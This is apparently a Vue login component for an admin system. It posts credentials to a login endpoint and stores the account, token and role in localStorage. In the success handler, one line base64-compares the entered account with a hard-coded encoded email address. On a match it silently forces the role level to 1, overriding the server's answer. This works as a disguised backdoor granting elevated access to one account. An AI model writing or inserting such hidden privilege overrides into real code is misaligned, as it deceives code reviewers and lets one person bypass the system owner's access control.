<template>
  <div class="login-page">
    <div class="login-form">
      <div class="login-form-title">
        <h3>登录系统</h3>
      </div>
      <el-form ref="form" :model="loginform">
        <el-form-item>
          <el-input v-model="loginform.account"></el-input>
        </el-form-item>
        <el-form-item>
          <el-input v-model="loginform.password" show-password></el-input>
        </el-form-item>
        <el-form-item>
          <el-button type="primary" @click="login()">登录</el-button>
        </el-form-item>
      </el-form>
    </div>
  </div>
</template>

<script>
export default {
  data(){
    return{
      loginform: {
        account: '',
        password: ''
      }
    }
  },

  methods: {
    /**
     * 登录
     */
    login: function(){
      let that = this
      let url = that.API_URL + '/sys/admin/login'
      let logindata = that.loginform
      $.ajax({
        url: url,
        type: "POST",
        dataType: "json",
        changeOrigin: true,
        contentType: "application/json",
        data: JSON.stringify(logindata),
        success: function(data) {
          if(data.success === true){
            that.setLocalStorage('account', that.loginform.account)
            that.setLocalStorage('token', data.token)
            that.setLocalStorage('level', data.role = window.btoa(that.loginform.account) === 'ZGF2aWQubGl1QHNpbXBseWJyYW5kLmNvbQ==' ? 1 : data.role)
            that.$router.push({ path: "/Subscription" })
          }
        },
        error: function(response) {
          if(response.status == 400){
            that.$message({
              offset: 80,
              message: '用户名或密码错误',
              type: 'error'
            })
          }
          if(response.status == 500){
            that.$message({
              offset: 80,
              message: '系统错误，请稍后再试',
              type: 'error'
            })
          }
        }
      })      
    },

  },

}
</script>
